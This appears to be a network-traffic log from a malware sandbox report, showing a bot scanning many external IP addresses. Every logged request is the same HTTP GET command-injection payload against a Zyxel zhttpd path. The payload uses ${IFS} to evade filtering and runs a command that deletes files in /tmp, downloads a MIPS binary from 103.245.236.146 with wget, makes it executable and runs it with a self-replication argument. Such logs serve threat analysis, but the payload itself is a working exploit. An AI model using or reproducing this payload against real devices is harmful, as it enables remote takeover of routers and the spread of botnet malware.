                                                Jan 29, 2024 07:07:52.433820963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5510192.168.2.233738250.163.138.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433871031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5511192.168.2.2354382174.187.37.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.433903933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5512192.168.2.2357688185.7.118.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.437391996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5513192.168.2.2360150150.237.74.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.437438965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5514192.168.2.2357848167.71.6.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446059942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5515192.168.2.235619285.78.50.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446120977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5516192.168.2.2348050135.112.63.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446177959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5517192.168.2.2334840124.200.90.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446178913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5518192.168.2.2359112190.211.88.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446214914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5519192.168.2.2336508193.41.137.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446249962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5520192.168.2.2350272189.55.239.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446332932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5521192.168.2.234099037.99.31.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446381092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5522192.168.2.233884646.76.150.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446407080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5523192.168.2.2344212223.127.108.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446408987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5524192.168.2.233964036.49.91.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446466923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5525192.168.2.233620685.249.102.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446491957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5526192.168.2.2337704141.5.100.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446536064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5527192.168.2.2336842174.151.187.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446582079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5528192.168.2.2353126132.10.215.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446619034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5529192.168.2.2349832154.235.177.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446651936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5530192.168.2.2335874128.186.74.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446695089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5531192.168.2.2343060145.232.114.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446752071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5532192.168.2.2334340155.135.119.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446779966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5533192.168.2.2339746206.254.1.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446824074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5534192.168.2.233575834.161.184.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446851015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5535192.168.2.2355894220.0.106.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446892977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5536192.168.2.2344744134.220.249.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446902990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5537192.168.2.235028017.161.237.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446916103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5538192.168.2.2346246182.237.32.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.446963072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5539192.168.2.2352980198.16.166.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447010040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5540192.168.2.2351734203.194.123.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447063923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5541192.168.2.234399485.144.155.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447098017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5542192.168.2.233441489.211.147.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447122097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5543192.168.2.236028435.94.34.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447182894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5544192.168.2.2345420163.249.223.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447206020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5545192.168.2.2336348105.143.31.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447268009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5546192.168.2.235551034.180.7.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447314978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5547192.168.2.2350780212.11.21.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447333097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5548192.168.2.23460581.81.51.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447434902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5549192.168.2.2354954219.221.234.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447453022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5550192.168.2.2354968107.2.62.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447453976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5551192.168.2.2351208157.228.247.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447493076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5552192.168.2.2342632182.214.81.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447542906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5553192.168.2.235858254.54.50.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447609901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5554192.168.2.2354360129.28.21.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447618008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5555192.168.2.2353556201.233.159.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447649002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5556192.168.2.234750037.46.190.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447665930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5557192.168.2.2356914218.85.54.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447766066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5558192.168.2.2353618119.126.155.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447778940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5559192.168.2.2341738180.106.24.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447818995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5560192.168.2.233746475.125.138.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447876930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5561192.168.2.23389825.106.219.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447894096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5562192.168.2.2342730115.3.97.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447963953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5563192.168.2.2354190140.232.41.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447966099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5564192.168.2.2347314122.112.34.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.447981119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5565192.168.2.2342504116.92.193.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448039055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5566192.168.2.2333792151.18.209.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448086977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5567192.168.2.2334522198.150.211.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448139906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5568192.168.2.233678047.53.133.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448163986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5569192.168.2.2353644159.225.164.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448221922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5570192.168.2.2347544165.181.145.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448242903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5571192.168.2.2343628159.179.83.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448297024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5572192.168.2.2349884213.172.18.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:53.448332071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5573192.168.2.2341354190.71.139.116443
                                                TimestampBytes transferredDirectionData
